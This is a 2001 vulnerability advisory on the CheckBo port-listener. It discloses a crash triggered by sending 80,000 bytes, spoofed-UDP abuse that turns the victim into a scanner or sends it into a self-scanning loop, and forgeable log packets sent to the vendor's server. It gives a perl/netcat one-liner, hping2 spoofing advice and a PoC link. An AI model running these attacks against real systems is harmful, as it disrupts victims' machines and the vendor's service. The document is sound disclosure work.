###################################################################### Luigi Auriemma Application: CheckBo (http://www.checkbo.com) Version: 1.56 (this is the last, no new versions released) The first attack run only on Win9x/Me systems Bug: Memo overflow and UDP problems 80.000 bytes to one of the TCP ports opened on the victim The program can be trasformed in a "tcp scanner" and the Statistics page on the web-site can be filled of customized and spoofed data Date: 20 Apr 2001 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ###################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ###################################################################### =============== 1) Introduction =============== CheckBo is a freeware application, enough diffused in Italy, for check possible attacks or scanning by script-kiddies. Unfortunately the program use a lame method for do these checks. In fact it stay in listening on some trojan ports (12345, 31337 and so on). Then this program is not secure, or is better to say that it creates new bugs and scare for the user that use it. The program bind the following ports: 54320, 54321 UDP, 31337 UDP, 20034, 12345, 12346, 31337, 31666, 1243 and 6713. ###################################################################### ====== 2) Bug ====== A] Memo overflow (?) ====================== This first bug is not a real buffer overflow but a bad management of the memo space on Win9x/Me systems. The problem is that CheckBo show all the data that the attacker send to its ports. So simply the attacker send a lot of data and the victim will see some alert messages and when the user will close the last dialog box, the program will be closed automatically. The size of the "bad" data must be at least 80.000 bytes. B] Defense program or attack program? ===================================== Yes this program can be easily used for transform the victim in an attacker. When someone try to connect to a port where CheckBo listen, the program will get some informations by the remote host. First it will resolve the IP into an hostname then it try to scan the following ports: - 139 = Windows Netbios - 1503 = Netmeeting calls (?) - 80 = Http - 12345 = Netbus - 31337 = Backorifice So it is simple to imagine an attacker that want to have fun with the victim and send a spoofed UDP packet to his 31337 or 54321 ports. The best result can be had with an UDP packet with the same source and destination IP addresses so CheckBo will start an infinite loop of checks to itself 8-) (this can be also counted like another bug...) C] Faked statistics page ======================== CheckBo have an interesting option (on by default) that is used for send log data to the CheckBo server log.checkbo.com. It sends an UDP packet to the 14188 port and this is its structure in C language: "%s ; %t ; Remote IP: %s ; %s ; Port: %d ; Local Port: %d ; Type: %s" The following is a real packet: < 43 68 65 63 6b 42 4f 2d 31 2e 35 35 43 46 20 3b # CheckBO-1.55CF ; < 20 57 65 64 20 4a 75 6c 20 30 34 20 30 35 3a 31 # Wed Jul 04 05:1 < 35 3a 32 34 20 31 39 38 34 0a 20 3b 20 52 65 6d # 5:24 1984. ; Rem < 6f 74 65 20 49 50 3a 20 31 39 32 2e 31 36 38 2e # ote IP: 192.168. < 30 2e 32 20 3b 20 44 4e 53 20 6e 6f 6e 20 64 69 # 0.2 ; DNS non di < 73 70 6f 6e 69 62 69 6c 65 20 3b 20 50 6f 72 74 # sponibile ; Port < 3a 20 31 30 38 33 20 3b 20 4c 6f 63 61 6c 20 50 # : 1083 ; Local P < 6f 72 74 3a 20 32 30 30 33 34 20 3b 20 54 79 70 # ort: 20034 ; Typ < 65 3a 20 41 74 74 61 63 63 6f 20 4e 65 74 42 75 # e: Attacco NetBu < 73 20 50 52 4f # s PRO All the field are strings so we can insert WHAT_WE_WANT in each field. Naturally this system is very insecure for the server that can be go down very easily 8-) You can view your statistics here: http://www.checkbo.com/statat.asp ###################################################################### =========== 3) The Code =========== Download this zip from: http://aluigi.org/poc/checkbo.zip For the bug A] you can also use these two methods: 1) perl -e ' for($i=1;$i<80000;$i++) { print "A"; }' | nc 12345 2) nc 12345 80Kbfile.txt For the problem B] use a simple UDP spoofer utility like HPing2 that can be downloaded from http://www.kyuzz.org/antirez/hping2.html ###################################################################### ====== 4) Fix ====== No fix. I suggest to delete this program because it is unuseful and dangerous. ######################################################################